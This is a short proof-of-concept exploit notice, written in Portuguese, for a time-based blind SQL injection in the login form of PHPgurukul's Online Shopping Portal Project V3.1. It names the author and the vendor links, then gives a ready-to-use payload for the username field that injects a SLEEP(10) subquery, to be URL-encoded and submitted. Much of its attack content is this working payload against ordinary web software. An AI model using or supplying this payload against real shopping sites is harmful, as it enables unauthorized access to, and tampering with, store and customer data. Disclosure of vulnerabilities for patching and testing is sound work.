
poc
Online Shopping Portal Project V3.1 permite que atacantes remotos executem comandos/consultas SQL arbitrários através do formulário de login, levando a acesso não autorizado e potencial manipulação de dados. Esta vulnerabilidade surge devido à validação insuficiente da entrada fornecida pelo usuário no campo de nome de usuário, possibilitando ataques de injeção SQL.
Título do Exploit: Online Shopping Portal Project V3.1 PHPgurukul - Time-Based Blind Sqli
Autor do Exploit: Akshad Joshi
Homepage do Fornecedor: https://phpgurukul.com
Link do Software: https://phpgurukul.com/shopping-portal-free-download/
Testado em: Linux
use este payload (codifique-o em URL):
[email protected]' AND (SELECT 1866 FROM (SELECT(SLEEP(10)))JHcH) AND 'GMDH'='GMDH